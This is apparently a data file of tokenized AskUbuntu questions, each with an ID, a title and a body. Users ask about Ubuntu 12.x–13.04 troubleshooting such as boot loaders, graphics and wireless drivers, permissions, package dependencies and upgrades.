285021	how can i access my mac osx home folder on my macbook ?	first of all , i 'm not under ubuntu , but pear os 7 , ( quantal based ) . i have a macbook pro 5,5 ( late 2009 ) with an ssd where there are the osx and pear os partitions , and an hdd where i store my osx home folder ( disk named `` data '' ) . i tried to follow this guide to be able to access my osx documents , but i 'm still not able to do that . when i access the `` data '' partition clicking on the icon on files file manager , then check the folders permission , i see that almost all of them are owned by user id 99 and group dialout ( the same group of which i changed the id following the guide ) . checking on the mac side , folders are owned by the right user and group , uid=501 and gid=20 . is there something i can do to solve this ? thanks for your attention
285028	ubuntu extracts an empty folder ? file manager issue	bekepart @ bekepart-system-product-name : ~/downloads $ unzip cucc.zip -d /home/bekepart/desktop archive : cucc.zip creating : /home/bekepart/desktop/cucc/ creating : /home/bekepart/desktop/cucc/gyak5/ creating : /home/bekepart/desktop/cucc/gyak5/gverem/ extracting : /home/bekepart/desktop/cucc/gyak5/gverem/integer_vermek.ads inflating : /home/bekepart/desktop/cucc/gyak5/gverem/megfordit.adb etc.etc puts many lines of this kind of stuff but on my desktop i end up with an empty `` cucc '' folder . edit : thank you for the comments , i tried a few things , seems like the extraction actually happens ( ls shows the files ) so i guessed its an updating issue , i pressed f5 in the file manager , and voilรก there are the files . i repeated the process out of curiosity , and it again forgot to update the `` file explorer '' no matter how many times i reopen that file explorer window ( `` cucc '' ) . from now on i should press f5 every time i visit a folder ( ? ) i guess its really something for the os to do . any idea , what causes the problem ?
285033	installing eclipse in ubuntu 12.04	i downloaded `` eclipse-jee-juno-sr2-linux-gtk.tar.gz '' how do i install it in the operating system ubuntu 12.04 ?
285040	what was the name of mac bottom panel in ubuntu ?	i forgot the name of the bottom panel like mac in ubuntu . what was it ? i remember it was like kiosk ... but i could n't reach any result by using this name .
285046	grid view at ubuntu touch - how to use it ?	in article about content views is a part about a grid view . but i did n't found anywhere how to use it . do you knew something about it ? tahnks for answer !
285055	dolphin file manager stops working after mounted samba server was turned off ( unexpected action ? )	i had mounted my samba share by editing file /etc/fstab it works , i can use resources on remote system as well as on my hdd . however , if i turn off my samba server , dolphin ( as i noticed ) stops working . it just not responding to my queries . when i launching a new dolphin application - the same thing . is this dolphin 's issue or fs mounting or what ?
285057	best way for repair files names ?	i 'm trying to backup directory , but some file names are `` corrupteds '' : rsync : recv_generator : failed to stat `` /media/ [ ... ] /ford transit/porte v\ # 351lo ford transit.odg '' : invalid or incomplete multibyte or wide character ( 84 ) what is the best way to `` repair '' them ? ( or replace corrupted character by '_ ' or '- ' ... )
285061	how will gnome 3.8 classic mode composite should i use it with compiz ?	definitely wan na try the new classic mode in gnome 3.8 , as it looks really nice from the screenshots , however i 'm a bit curious how well it 'll composite when coupled with some compositing manager , like for example , compiz , as i bet you could do some pretty sweet stuff with a compositing manager in it . any of you try to composite gnome 3.8 fallback before ?
285065	is it possible to replace my workspace switcher icon with an icon-sized `` expo '' ?	basically , i want to take what 's displayed on the desktop when i hit super+s , shrink it down to icon size , and replace the default workspace switcher icon with it in ubuntu 12.04 's launcher and still be fully functional . any ideas ? i 've done some poking around but i do n't know much about code . there are quite a few workspace.js files . if anybody needs too see those to help me let me know . i saw lines in the code that were obviously telling the switcher where and how to display . such as : class workspace ( tweakmodule ) : __title__ = _ ( 'workspace ' ) __desc__ = _ ( 'workspace size and screen edge action settings ' ) __icon__ = 'workspace-switcher' __category__ = 'desktop' __desktop__ = [ 'ubuntu ' ] utext_edge_delay = _ ( 'edge trigger delay ( ms ) : ' ) utext_hsize = _ ( 'horizontal workspace : ' ) utext_vsize = _ ( 'vertical workspace : ' )
285067	is there a way to use facebook on gwibber using https transport ?	today i configured for the first time gwibber on my ubuntu 12.04 . everything worked fine with twitter , but when i added my facebook credentials , i got no error messages but the account was n't added . after several trial-and-errors attempts , i tried to disable https on my facebook account ( under account settings- > protection ) and finally i was able to get facebook status updates in my gwibber . when i tried to switch https on again , the account resulted disconnected in gwibber . what can i do to fix it ? i do n't want to use facebook without https , since i believe it 's a very unsafe behavior .
285070	logging out leaves the display in a garbled state , unable to restart x , or switch to text console	i have a problem with ubuntu 12.04 . i am running on a zotac z68itx motherboard , which has both a nvidia graphic card gt430 onboard , and a intel integrated one on chip . i set the pge/pciex option in the bios and plugged into the nvidia dvi port to my tv hdmi in . the ubuntu is freshly installed . i also installed the nvidia-current drivers and i can successfully boot and run glxgears . the problem occurs when i log out . instead of getting back to the lightdm login , i get this `` corrupted text '' after this , the screen goes back to low res , and it blanks to a corrupted blinking cursor . i ca n't do anything except rebooting . even ctrl-alt-f1 does not switch to text console . rebooting is only possible with the off button . it shows more lines of corrupted text as the services are shut down . any idea ? edit : i do n't know the reason behind the garbled text , but i was able to get to a console after the event , and starting x manually leads to the following error nvidia : could not open the device file /dev/nvidia0 ( input/output error ) i am browsing around , but i have n't settled on a solution yet , mostly because i am doing other things in the meantime .
285074	is it safe to install the nvidia drivers in ubuntu 13.04 ?	in 12.10 , the installation of the nvidia driver was risky and nerve-wrecking . fortunately , i was able to find some instructions to get it to work , but unfortunately not until after borking an install . have the bugs with the nvidia driver installation in 12.10 been fixed in 13.04 ? is it safe to install the nvidia driver using the steps detailed here , or better yet , by just running apt-get install nvidia-current-updates ? edit : i do not believe this question is a duplicate , because the one linked to does not address the safety of the install , nor the issues that arose in 12.10 . before asking this question , i found the one you linked to and it did not satisfy my question , thus the reason i asked . also , this is no small bug . it completely destroyed my system and forced a complete reinstall . after a traumatic experience such as that , a little verification that the bug is fixed is not only prudent , but necessary .
285082	where are my launcher icons ?	ubuntu crashed finally after several months ( i think it is my hard drive failing ) . i reinstalled 12.04.02 , but all i get is a screen with no launcher icons strip . i am able to change the desktop background , and i have the slidbar to adjust icon size , but it does n't matter , since i have no icons ... if i log in as guest , i get the launcher strip on the left.i have shut down and started several times , but it is the same . the guest gets the icons , and the administrator does not . what gives > i am not using the hide launcher option . even so , i tried banging the sides and upper left corner , but no effect . i am not a sophisticated linux user ...
285086	image from webserver is not shown in web browser	i am new ubuntu and recently i install 'xampp 1.8.1 ' on my ubuntu 12.10 . my problem is that image from server can not be shown . my code is < div class= '' sideblock unsung '' > < h4 > unsung heroes ... < /h4 > < a href= '' # '' > < img src= '' _images/1_full.jpg '' alt= '' midnight run '' width= '' 99 '' height= '' 135 '' / > < /a > < a href= '' # '' > < img src= '' _images/2d7y3ki.jpg '' alt= '' wyatt earp '' width= '' 99 '' height= '' 135 '' / > < /a > < /div > here , in my address bar i use http : //localhost/madetemplet/basictemplet/templet03.html and i want to show image after unsung heroes text but it only shown some link and not any image . but when i use the following file : ///opt/lampp/htdocs/madetemplet/basictemplet/templet03.html and images are shown after unsung heroes text . it works well in windows platform . as a new user , i have very few knowledge about file permission , chmod , chown etc . i use ls -l in my terminal window in /opt/lampp/htdocs/madetemplet/basictemplet/_images directory , then some texts have come which is look like as below : : sabbir @ sabbir-pc : /opt/lampp/htdocs/madetemplet/basictemplet/_images $ ls -l total 300 -rw -- -- -- - 1 sabbir sabbir 204067 feb 24 2010 1_full.jpg -rw -- -- -- - 1 sabbir sabbir 75789 nov 13 2009 2d7y3ki.jpg -rw -- -- -- - 1 sabbir sabbir 23692 apr 21 2010 6ab32ae44600435b9de0fb5eba24a912.gif i also go to /opt/lampp/etc/httpd.config for finding enablemmap off and enablesendfile off which is already # off . how to solve this problem ?
285089	why does my xubuntu libreoffice looks ugly ?	my libreoffice installation looks like windows 95 . the rest of my xubuntu looks okay . why ? how can i fix it ? click on the image for a full-resolution picture . on the screenshot leafpad and calculator are open for comparation . click on the image for a full-resolution picture . click on the image for a full-resolution picture .
285091	getting wifi to work on ubuntu 12.10 for macbookpro	so i recently installed ubuntu 12.10 on my macbookpro and i 've tried installing various drivers such as broadcom sta wireless , however when i install them or at least i think i 've installed them , they do not show up in my additional drivers . any solutions anyone ?
285094	zenbook ux31a usb3 not recognised and not working	i have a zenbook ux31a and ubuntu 12.10 upgraded to /latest/ kernel 3.8.6-030806-generic . my usb3 controller is not recongnized and i am stuck with usb 2.0 speeds . listing of dmesg has no mention of usb followed by number 3 or xhci . threre are no modules modules containing xhci in mane . i 'll get back with results from win8 , when i reboot next time . please help to diagnose . 10:09:48 ~ $ lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:04.0 signal processing controller : intel corporation device 0153 ( rev 09 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 00:1f.6 signal processing controller : intel corporation 7 series/c210 series chipset family thermal management controller ( rev 04 ) 02:00.0 network controller : intel corporation centrino advanced-n 6235 ( rev 24 ) 10:09:58 ~ $ lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0eef:7908 d-wav scientific co. , ltd bus 001 device 004 : id 0bda:0139 realtek semiconductor corp. card reader bus 002 device 009 : id 0b95:7e2b asix electronics corp. ax88772b bus 002 device 004 : id 04f2 : b368 chicony electronics co. , ltd bus 002 device 007 : id 8087:07da intel corp .
285096	is there a software to analyze and improve video sound quality on ubuntu ?	i have tons of youtube videos ( ones that i downloaded with the downloadhelper ) that i use at home to listen to music using vlc ( which obviously plays the video too ... .and it makes a perfect combination for our parties ) . my problem is that the sound quality varies ... ..is there a way to analyze these videos and improve the sound quality ( or at least bring it to the same level ) with a programme ?
285097	how do i get ubuntu 12.10 to recognize a displaylink monitor	i have a laptop running ubuntu 12.10 , i have one external monitor connected using the vga port and it works fine . i want to get a second external monitor connected to it via a displaylink adapter . when i plug it in the screen turns on a goes green . but when i run xrandr this is what i get as output screen 0 : minimum 320 x 200 , current 2650 x 1680 , maximum 8192 x 8192 lvds1 connected 1600x900+1050+347 ( normal left inverted right x axis y axis ) 382mm x 214mm 1600x900 60.1*+ 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1050x1680+0+0 left ( normal left inverted right x axis y axis ) 474mm x 296mm 1680x1050 59.9*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 75.0 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) i tried to download the display link drivers but they are n't being found . what is my next step here ?
285110	how to change matlab 's default work folder ?	after installing matlab2012b and starting it , the folder matlab gets created under ~/documents/ . i want this matlab folder to be created in other directory , for example ~/documents/workspace . what should i do ?
285112	install ubuntu alongside windows xp , is this possible on a 2001 system ?	my windows xp is not going to be servicing security updates anymore after 2014 , is it possible to download ubuntu/linux on my current system and transfer all current files to ubuntu ? i would like to install ubuntu 12.04 .
285113	how to remove windows from grub menu ?	my setup is gnomeshell remix 12.04 and windows 7 dual boot . now everything works fine , however , i rarely ever boot windows and i would like to remove the windows entry from my grub menu completely and remove the recovery and memtest as well . that way , i hit power , wait a few seconds and i have my login screen , but if i ever get the urge to play simcity , or wow , or anything else that runs better in windows 7 , then i insert usb , reboot , select windows 7 and away i go . is this at all possible ; i 'm sure it must be , but i 'm just not sure how to go about it . i 'm ok with terminal , so i 'm not scared to have a go , so any help/advice would be appreciated .
285123	firestarter `` active connections '' is empty , how to fix ?	on ubuntu 12.10 , no matter what i do , firestarter `` active connections '' is empty . it expects /proc/net/ip_conntrack or /proc/net/nf_conntrack to be available , but these files doesnt exis't.. if i try sudo modprobe ip_conntrack or sudo modprobe nf_conntrack some modules are loaded , lsmod : nf_conntrack_irc 13350 0 nf_conntrack_ftp 13360 0 nf_conntrack_ipv4 14481 9 iptable_nat , nf_nat nf_conntrack 82634 7 ipt_masquerade , nf_conntrack_irc , nf_conntrack_ftp , xt_state , iptable_nat , nf_nat , nf_conntrack_ipv4 nf_defrag_ipv4 12730 1 nf_conntrack_ipv4 but even after that , still the files at /proc/net are not created . any tips ? ps . : i wonder also if someone wont create a fork of firestarter and improve it ? edit : this wont solve the problem but is a good way to see the connections until firestarter can handle it again interactively to create policies sudo -k iptstate -f
285125	having multiple < family > in < alias > is n't supported and may not works as expected	fontconfig warning : `` /usr/lib/libreoffice/share/fonts/truetype/fc_local.conf '' , line 13 : having multiple < family > in < alias > is n't supported and may not works as expected i run my script in terminal and i have this error . it looks like ubuntu error : https : //bugs.launchpad.net/ubuntu/+source/libreoffice/+bug/1048552 how to fix it ?
285127	i seem to suck at figuring out how to put a password in	i need some help . i ca n't access synaptic package manager because it wants a password and i never set a password . i am not a programmer and no longer have anyone but this site to help me figure out how to operate ubuntu . i guess the real learning starts here anyways . how do i access my password ? thanks
285129	why cant i just download firefox and run it ?	previously i was able to just click `` download firefox '' and it would `` do its thing '' but now it comes as a tar.bz2 file , which i have no idea how to deal with . are geeks just getting lazy or just trying to make the less commuter literate feel stupid ?
285130	xmobar silently ignoring battery directive	xmobar seems to just be completely ignoring my battery command/directive . my .xmobarrc config { font = `` xft : ubuntu : size=10 : antialias=true '' , bgcolor = `` black '' , fgcolor = `` grey '' , position = topw l 95 , loweronstart = true , commands = [ run date `` % a % b % _d % y % r '' `` date '' 10 , run battery [ `` -t '' , '' batt : % / `` , '' -l '' , '' 25 '' , '' -h '' , '' 75 '' , '' -h '' , '' green '' , '' -n '' , '' yellow '' , '' -l '' , '' red '' , '' -- '' , '' -c '' , '' energy_full '' ] 10 , run stdinreader ] , sepchar = `` % '' , alignsep = `` } { `` , template = `` % stdinreader % } { % battery % % date % '' } date and and stdinreader output both appear , no battery output at all . only output from the actual command is fields missing from config defaulted : border , bordercolor
285131	how to create multiple folders each with multiple sub-folders	is there a way of doing this at the terminal ? i.e . without writing a script , e.g . mkdir subject { 1,2,3,4 } /book { 1,2,3 } why doesnt the preceeding work with or without the -p option ?
285135	ubuntu boots to a grub prompt	so i installed ubuntu 12.10 32 bit , as was recommended . i used the windows installer ( wubi ) . i rebooted my computer and when the choices of which os i would like to start i choose ubuntu . after i press enter it just goes to what i am thinking is a command prompt screen . it has the word grub > . i do not know what to do next . i tried a few command prompts but nothing i am using an ibm think pad with a pentium m 1600mhz processor 512 ram did i do something wrong ? do i need the 64 bit ? or do i need the 12.04 download ? how do i uninstall it if i need to .
285139	unable to play audio and video files	i am new to linux and installed ubuntu 12.10 . it is showing some codecs or plugins are missing in the player
285147	what do i do to fix this dual boot ? error : out of disc grub rescue >	i just instaled ubuntu 10.04 to my old computer that has windows xp sp3 and a new hardrive.at the end it said it need to reboot and when it did i got this . error : out of disc grub rescue > how do i fix this ? when i partitioned the drive i gave it 79gigs.i set all the settings as told.any ideas ? im a first time linux user and if told to type code please type it exactly as it should be typed as i dont know how to type that stuff much .
285150	vm can not connect to internet	i am currently making use of virtualbox . my host is an ubuntu machine , as well as my guest . for some reason , my guest can not connect to the internet . as like most posts i have seen on the internet , i have set my network adapter to nat through virtual box . i have tried everything i have seen on the internet , but no luck . can anybody please give me any ideas on how i can solve this issue please ? the version i am currently using is qt 4.1.18 . i downloaded it from the ubuntu software centre . i have also tried installing another virtual machine , but neither does this have internet . ( set to nat like the previous ) . is it fair to assume that the problem is on the host side ? obviously , on the host i do have internet . as for the adapter type , i am making use of intel pro/1000 mt desktop . furthermore , the host connects to the internet through a wireless adapter
285151	dell xps 15z - 64 bit os not installing , but a 32 bit os will install	i have the following system : dell xps 15z i7 core processor 16gb of ram 2gb nvidia card this system is well capable of having a 64 bit os on it . at first i thought it was just a bad image burn , but after downloading the ubuntu 12.10 and 12.04 both 64 bit and 32 bit i have found out that the 32 bit will install with no problems . the 64 bit , however , will give me either a white small cursor which is solid not blinking and will run my system hot , or give me a kernel error . i have tried this article , which was although helpful in many ways , not helping in my installation issue . what could be the issue here ?
285152	why i can not login after set the path envrionment variable	i am using the 12.04lst , and i am trying to install the oracle jdk7 manually . then i update the /etc/environment to set the path variable . this is the original file content : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' and i update it as this : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' java_home= '' /usr/lib/jvm/jdk1.7 '' path= '' $ path : $ java_home/bin '' then i make it work using : source /etc/environment then i type java and javac , and it worked . however after i reboot my computer , i was kept at the login screen . then i use ctrl+alt+f2 to go the terminal . and update the /etc/envrionment like this : /usr/bin/sudo /usr/bin/nano /etc/emvrionment to the following : path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games '' java_home= '' /usr/lib/jvm/jdk1.7 '' then i can login again . now i have two questions : why i can not login if i add the line path= '' $ path : $ java_home/bin '' in /etc/envirionment ? is variables set in /etc/environment is available for all the user ?
285156	dash wont change color with background and desktop is white no matter what i change it to	how do i fix this ? please note i am using quantal . i performed the change shown here . edit : i upgraded to raring and the problem went away . a little while later i logged off and logged back on . the problem showed up again . i think it has something to do with the action of logging on and off .
285160	youtube wo n't open ?	recently i install ubuntu 12.10 after install i update my ubuntu and also install adobe flash player and jdk , but still youtube wo n't be opened it only displayed as like as when page ca n't be load for slow connection or somethings . it gives the same result in firefox and google chrome . how to open youtube on my ubuntu .
285163	ralink rt3290 ca n't be installed	i tried installing rt3290 wireless drivers in my hp 2314ax laptop running on ubuntu 13.04 . but when i tried do enter the make command , the next errors are being displayed . how to solve this ? pavan @ pavan-hp-pavilion-g6-notebook-pc : ~ $ cd ~/dpo_rt3290_linuxsta_v2600_20120508/ pavan @ pavan-hp-pavilion-g6-notebook-pc : ~/dpo_rt3290_linuxsta_v2600_20120508 $ make make -c tools make [ 1 ] : entering directory `/home/pavan/dpo_rt3290_linuxsta_v2600_20120508/tools' gcc -g bin2h.c -o bin2h make [ 1 ] : leaving directory `/home/pavan/dpo_rt3290_linuxsta_v2600_20120508/tools' /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/tools/bin2h cp -f os/linux/makefile.6 /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/makefile make -c /lib/modules/3.8.0-19-generic/build subdirs=/home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_mcu.o /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_mcu.c : in function ‘rtmpasicsendcommandtomcu’ : /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_mcu.c:464:8 : warning : unused variable ‘offset’ [ -wunused-variable ] /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../common/rtmp_mcu.c:463:8 : warning : unused variable ‘configuration’ [ -wunused-variable ] cc [ m ] /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.o /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:43:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_remove_one’ /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:44:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_probe’ /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:63:46 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘__devinitdata’ /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:85:17 : error : ‘rt2860_pci_tbl’ undeclared here ( not in a function ) /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:86:17 : error : ‘rt2860_probe’ undeclared here ( not in a function ) /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:88:5 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function-declaration ] /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:88:29 : error : ‘rt2860_remove_one’ undeclared here ( not in a function ) /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:292:24 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_probe’ /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:463:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rt2860_remove_one’ /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.c:71:1 : error : ‘__mod_pci_device_table’ aliased to undefined symbol ‘rt2860_pci_tbl’ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux/../../os/linux/pci_main_dev.o ] error 1 make [ 1 ] : *** [ _module_/home/pavan/dpo_rt3290_linuxsta_v2600_20120508/os/linux ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ linux ] error 2
285164	how do i install ubuntu over earlier ubuntu ?	my upgrade manager is broken on 10.04 . i have been stuck on 10.04 . my upgrade manager wo n't fetch something that it needs to and fails to upgrade . i have put the install iso on a thumb drive and push f12 to boot from usb memory but all i get is a blinking cursor . how do i install new ubuntu over 10.04 ? it says could be network problem but thunderbird pidgin and firefox all work .
285167	shotwell event name in folder name ?	i use the following directory structure in my pictures folder : ~/pictures/2013/20130102_event_name this way , i can easily browse all photos from 2013 without going too many levels of subfolders in . furthermore , each event has a short name associated with it acting as a reminder what happened . so far , shotwell can handle the date format but i do n't see a way to include the event name . has anyone else faced a similar challenge ? is there a way to extend the directory structure shotwell understands ?
285170	ca n't convert `.bin` file into `.iso` format with the command `bchunk`	i have .bin & .cue movie file ready for burning , and i 'm trying to convert it into the .iso file format using bchunk . my problem is that it gives me .ugh file format instead of .iso as a result as seen in the picture p. s : my os is ubuntu 12 . 04 with a 64 bit architecture .
285171	how to make programs minimize when you click on them on the launcher	i am running ubuntu 12.04 lts . i just want the programs to minimize like they do on the windows 7 taskbar , if that gives you a idea of what i am talking about .
285185	how to dual boot ubuntu in samsung rf511 while keeping the samsung recovery solutions alive ?	see i have a samsung rf511 and i really want to dual boot it with my existing windows 7 ( factory default ) and ubuntu 12.04 and i want to have samsung recovery solution working pls if any one from other samsung laptop owners can also help
285191	how do i enable hyperthreading ?	we have the following cpu that supports hyper-threading . though ubuntu does n't recognize that each core supports 4 threads . intel速 xeon速 processor e5-2407 http : //ark.intel.com/products/64614/ the server is a dell poweredge r320 http : //www.dell.com/support/manuals/us/en/19/product/poweredge-r320 the results of lscpu is lscpu architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit cpu ( s ) : 2 thread ( s ) per core : 1 core ( s ) per socket : 2 cpu socket ( s ) : 1 numa node ( s ) : 1 vendor id : genuineintel cpu family : 6 model : 23 stepping : 10 cpu mhz : 800.000 virtualization : vt-x l1d cache : 32k l1i cache : 32k l2 cache : 6144k i 've gone thru and checked the bios and i enabled all the features related to virtualization and logical cpus . any ideas ? cpufreq is not being run as asked below sudo cpufreq-info cpufrequtils 007 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 1 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 2 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 3 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms .
285199	what happened to ubuntu desktop 's global menu and linux kernel 3.8.5 ?	i 'm just wondering what happened to ubuntu desktop 's global menu and linux kernel 3.8.5 ? 3.8.5 is supposed to land in raring , but my iso ( just a day old before release ) does n't have it ( 3.8.0-19 generic ) . same thing goes with some of the applications with the global menu . ubuntu desktop does n't have it , files , appearance , and other application 's menu has problems ( repeats the name twice ) . do they plan on not fixing/releasing it ? sorry for the weird question , but the `` defective '' panel menu is driving me nuts . the `` can not set freq 16000 to ep 0x86 '' is also pretty frustrating ( i do n't want to keep unplugging my webcam every single boot ) .
285204	is there a user friendly way of mounting an external drive that was ejected ?	i have a very noisy external 500 gb drive which i use mostly for synchronizing local files . in os x i used to eject the drive , and mount it later when i need it with the disk utility . is there a gui for doing so in ubuntu ?
285206	how do i get glibc > = 2.16.0 ?	i know there are already built packages for pidgin . i need to build pidgin so i can build plug-ins . i need glibc > = 2.16.0 . unfortunately , i get stuck in an endless dependency loop . i need libgtk2.0-dev and libglibc-devel which apparently needs libpango1.0-dev . libpango1.0-dev needs libcairo2-dev . libcairo2-dev needs libcairo2 , libcairo-gobject2 , and libpixman-1-dev . then it says `` unable to correct problems , you have held broken packages . '' how can this be true if i ran sudo apt-get install -f and it spat out the following : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : pidgin-libnotify indicator-status-provider-pidgin liblaunchpad-integration1 libodbc1 use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i do n't want to remove them . the system may not need them , but i still want them . sometimes i think apt has a dependency problem , not the packages . however , that is beyond the scope of my question . so again , how do i get these dependencies without using dpkg and possibly introducing foreign sources which will inevitably break my system ?
285209	ubuntu 12.04.2 startup waits on splash screen and loads desktop only after pressing tab	ubuntu on startup shows the splash screen ( with the dots rotating animation going on and on ) . and only when i press tab key it stops and the desktop loads . what may be the problem ? am having ubuntu 12.04.2 installed through wubi and with kernel 3.5.0-21-generic .
285212	keeping the same /home partition after a clean install	i currently have 2 partitions for my ubuntu installation : a / partition and a /home partition . when ubuntu 13.04 is released i plan to reinstall ubuntu while keeping the same home partition . is it safe to just mount the /home partition directly in the partitioning process of the installation ? because there are files present in my home partition already will the installer wipe the partition or will it just mount the partition ?
285216	upgrade from 12.10 to the new 13.04 ubuntu os	what is the best way to upgrade your distro with ubuntu ? i am currently using a lvm partition booting with uefi boot firmware . last time i upgraded my distro , i could n't boot up . i am using a dell inspiron 7520 , and i am issuing troubles with my graphic because it is a intel/ati hybrid . i just want to know what would be the best way to upgrade my distro without having to reinstall the whole thing again . thank you = )
285220	updated ppa for gparted	i am looking for a ppa that has an updated version of gparted . the one in the official repositories is very old ( version 0.12.1 ) . since then , there has been 10 new versions . the last one was the 0.16 that came out yesterday . is there a ppa that offers the latest gparted , specially because of the fixes it hovers and new file systems it supports .
285225	unmet dependencies right after installing vlc	i got the following error after installing vlc on my quantal 12.10 . checked for libass4 and its already there . is there anybody encountering this same silly error and willing to resolve.. ? ? priyevsingh @ priyevsingh-k43u : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done 0 upgraded , 0 newly installed , 0 to remove and 30 not upgraded . 4 not fully installed or removed . need to get 0 b/56.2 kb of archives . after this operation , 0 b of additional disk space will be used . dpkg : error processing libass4 : amd64 ( -- configure ) : package libass4 : amd64 is not ready for configuration can not configure ( current status `half-installed ' ) dpkg : dependency problems prevent configuration of vlc-nox : vlc-nox depends on libass4 ( > = 0.9.7 ) ; however : package libass4 : amd64 is not installed . dpkg : error processing vlc-nox ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of vlc-plugin-notify : vlc-plugin-notify depends on vlc-nox ( = 2.0.6+git20130423+r563-0~r46~quantal1 ) ; however : package vlc-nox is not configured yet . dpkg : error processing vlc-plugin-notify ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of vlc-plugin-pulse : vlc-plugin-pulse depends on vlc-nox ( = 2.0.6+git20130423+r563-0~r46~quantal1 ) ; however : package vlc-nox is not configured yet . dpkg : error processing vlc-plugin-pulse ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : libass4 : amd64 vlc-nox vlc-plugin-notify vlc-plugin-pulse e : sub-process /usr/bin/dpkg returned an error code ( 1 ) priyevsingh @ priyevsingh-k43u : ~ $
285229	will video drivers after upgrade to 13.04 still work ?	the biggest fear i have if i upgrade to 13.04 is that the video driver i use will no longer work on the new version . i 'm currently using a amd radeon and the driver is here http : //support.amd.com/us/gpudownload/linux/pages/radeon_linux.aspx ? type=2.4.1 & product=2.4.1.3.42 & lang=english but i do n't want to upgrade and find that the driver does n't work . if i do n't have a 3d driver the computer will be useless . can anyone confirm that these drivers will work with 13.04
